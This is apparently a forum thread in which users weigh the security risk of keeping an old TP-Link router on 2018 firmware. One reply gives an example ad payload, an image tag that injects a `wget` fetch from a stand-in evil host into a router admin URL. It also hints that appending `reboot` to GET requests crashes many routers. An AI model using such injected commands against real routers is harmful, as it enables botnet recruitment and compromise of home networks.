[von_tenia]

I'm using a 7 years old TP-Link router wifi, the last official firmware available is from 2018. I disabled features like remote administration and file-sharing. I also setup WPA2, disabled WPS and have a strong password on the admin. What is the real risk for me? I get that it is always preferable to have an up to date device for security but I also wish to not create more electronic waste (and I unfortunately have stability issues with OpenWRT). From my understanding cracking a WPA2 passphrase isn't as easy as it used to be with WPA1 or WEP, and not having the admin interface exposed to the outside world limit the risk of someone breaking in. So realistically, assuming I'm not targeted by some APT group, would breaking into my router be that easy?

[jeroenhd]

It depends. If there's a vulnerability in the firmware that allows unauthenticated code execution from a generic GET request, malvertising on your computer could load an IMG tag with the SRC set to your router's IP and deploy malware to your router. From there your router could become part of a botnet, the router's DNS settings could be changed to redirect websites through some malvertising DNS server, and whatever the router can access in your network (dev database server?) could be extracted. Sometimes all it takes is an <img src="http://10.1.1.1/admin/getSettings?command=`wget http://ev.il/|curl`" /> in an ad.

Such vulnerabilities are more common than most vendors would like to admit. Adding `reboot` to random GET requests gets you quite far with quite a lot of consumer routers. I have little experience with TP Link software outside of flashing OpenWRT on their hardware.

There's been already scanners that target specific ISP routers for specific ISPs in specific countries already. In practice the probability of getting hit like this is very low, but the risk is still there.

With four years of updates, TP Link might actually care enough about security to not allow trivial exploits to execute code on their routers. Many vendors I know won't update past a year or two. I'd say the risk is low to very low in practice, but I'd watch out with running sensitive services (if you're in a healthcare startup, for example) while working from home.

[UI_at_80x24]

Yes, but;

Consumer routers all have security holes that can be exploited even when you do everything correctly like you did.

https://www.cvedetails.com/vulnerability-list/vendor_id-1193...

Looking at this one:

    TP-Link TL-WR940N is vulnerable to a stack-based buffer overflow, caused by improper bounds checking by the ipAddrDispose function. By sending specially crafted ICMP echo request packets, a remote authenticated attacker could overflow a buffer and execute arbitrary code on the system with elevated privileges.

Your only safe(ish) bet is to build your own, and hope that Linux/BSD close all the exploits that get discovered.